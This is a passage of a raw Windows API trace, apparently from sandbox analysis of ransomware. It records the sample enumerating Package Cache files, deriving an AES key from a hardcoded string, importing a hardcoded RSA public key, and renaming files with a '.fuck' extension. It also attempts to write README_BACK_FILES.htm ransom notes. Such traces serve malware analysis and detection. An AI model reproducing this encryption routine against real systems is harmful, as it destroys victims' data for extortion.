pInfo=0x2869d48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869d78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869d80*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27ead10) returned 1 [0238.195] CryptEncrypt (in: hKey=0x27ead10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.195] CryptEncrypt (in: hKey=0x27ead10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285b818*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285b818*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.195] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285b818, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.195] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.195] CryptEncrypt (in: hKey=0x27eae90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.196] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.196] CloseHandle (hObject=0xffffffff) returned 1 [0238.196] CloseHandle (hObject=0xffffffff) returned 1 [0238.196] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), bFailIfExists=0) returned 0 [0238.196] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x0) returned 0 [0238.196] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg")) returned 0 [0238.196] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.fuck" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.fuck")) returned 0 [0238.197] CryptDestroyHash (hHash=0x27eaa50) returned 1 [0238.197] CryptDestroyKey (hKey=0x27eae90) returned 1 [0238.197] CryptReleaseContext (hProv=0x285b1b8, dwFlags=0x0) returned 1 [0238.197] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.197] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.197] GetLastError () returned 0x5 [0238.197] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi")) returned 0x20 [0238.197] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", dwFileAttributes=0x80) returned 0 [0238.197] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.198] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.198] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg", dwFileAttributes=0x2) returned 0 [0238.199] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285b5f8) returned 1 [0238.201] CryptCreateHash (in: hProv=0x285b5f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.201] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.201] CryptHashData (hHash=0x27ead90, pbData=0x2ec800, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.201] CryptDeriveKey (in: hProv=0x285b5f8, Algid=0x6610, hBaseData=0x27ead90, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27eae10) returned 1 [0238.201] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.201] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.201] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285b3d8) returned 1 [0238.202] CryptImportPublicKeyInfo (in: hCryptProv=0x285b3d8, dwCertEncodingType=0x1, pInfo=0x2869e18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869e48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869e50*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27eae90) returned 1 [0238.202] CryptEncrypt (in: hKey=0x27eae90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.202] CryptEncrypt (in: hKey=0x27eae90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285b8a0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285b8a0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.202] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285b8a0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.202] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.202] CryptEncrypt (in: hKey=0x27eae10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.202] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.202] CloseHandle (hObject=0xffffffff) returned 1 [0238.202] CloseHandle (hObject=0xffffffff) returned 1 [0238.202] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), bFailIfExists=0) returned 0 [0238.202] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", dwFileAttributes=0x0) returned 0 [0238.203] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg")) returned 0 [0238.203] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.fuck" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.fuck")) returned 0 [0238.203] CryptDestroyHash (hHash=0x27ead90) returned 1 [0238.203] CryptDestroyKey (hKey=0x27eae10) returned 1 [0238.203] CryptReleaseContext (hProv=0x285b5f8, dwFlags=0x0) returned 1 [0238.203] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.203] FindClose (in: hFindFile=0x27eac90 | out: hFindFile=0x27eac90) returned 1 [0238.204] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\readme_back_files.htm")) returned 0xffffffff [0238.204] AreFileApisANSI () returned 1 [0238.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286d648, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 134 [0238.204] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.204] GetLastError () returned 0x5 [0238.204] GetLastError () returned 0x5 [0238.204] FindNextFileA (in: hFindFile=0x27ea810, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0238.204] FindClose (in: hFindFile=0x27ea810 | out: hFindFile=0x27ea810) returned 1 [0238.204] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\readme_back_files.htm")) returned 0xffffffff [0238.204] AreFileApisANSI () returned 1 [0238.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2df0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0238.204] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.205] GetLastError () returned 0x5 [0238.205] GetLastError () returned 0x5 [0238.205] FindNextFileA (in: hFindFile=0x27ead50, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.205] FindClose (in: hFindFile=0x27ead50 | out: hFindFile=0x27ead50) returned 1 [0238.205] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\readme_back_files.htm")) returned 0xffffffff [0238.205] AreFileApisANSI () returned 1 [0238.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e28c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0238.205] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.205] GetLastError () returned 0x5 [0238.206] GetLastError () returned 0x5 [0238.206] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.206] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x27eac90 [0238.206] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.206] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.206] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27eacd0 [0238.207] FindNextFileA (in: hFindFile=0x27eacd0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.207] FindNextFileA (in: hFindFile=0x27eacd0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.207] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27ea8d0 [0238.208] FindNextFileA (in: hFindFile=0x27ea8d0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.208] FindNextFileA (in: hFindFile=0x27ea8d0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.208] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.208] GetLastError () returned 0x5 [0238.208] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab")) returned 0x20 [0238.208] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0238.208] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.208] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.209] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0238.209] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285b928) returned 1 [0238.211] CryptCreateHash (in: hProv=0x285b928, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.211] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.211] CryptHashData (hHash=0x27ead50, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.211] CryptDeriveKey (in: hProv=0x285b928, Algid=0x6610, hBaseData=0x27ead50, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27ea990) returned 1 [0238.211] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.211] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.211] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285b460) returned 1 [0238.211] CryptImportPublicKeyInfo (in: hCryptProv=0x285b460, dwCertEncodingType=0x1, pInfo=0x2868b68*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2868b98*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2868ba0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27eae10) returned 1 [0238.211] CryptEncrypt (in: hKey=0x27eae10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.212] CryptEncrypt (in: hKey=0x27eae10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285b9b0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285b9b0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.212] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285b9b0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.212] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.212] CryptEncrypt (in: hKey=0x27ea990, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.212] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.212] CloseHandle (hObject=0xffffffff) returned 1 [0238.212] CloseHandle (hObject=0xffffffff) returned 1 [0238.212] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), bFailIfExists=0) returned 0 [0238.212] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x0) returned 0 [0238.213] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg")) returned 0 [0238.213] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.fuck" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.fuck")) returned 0 [0238.213] CryptDestroyHash (hHash=0x27ead50) returned 1 [0238.213] CryptDestroyKey (hKey=0x27ea990) returned 1 [0238.213] CryptReleaseContext (hProv=0x285b928, dwFlags=0x0) returned 1 [0238.213] FindNextFileA (in: hFindFile=0x27ea8d0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.213] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) 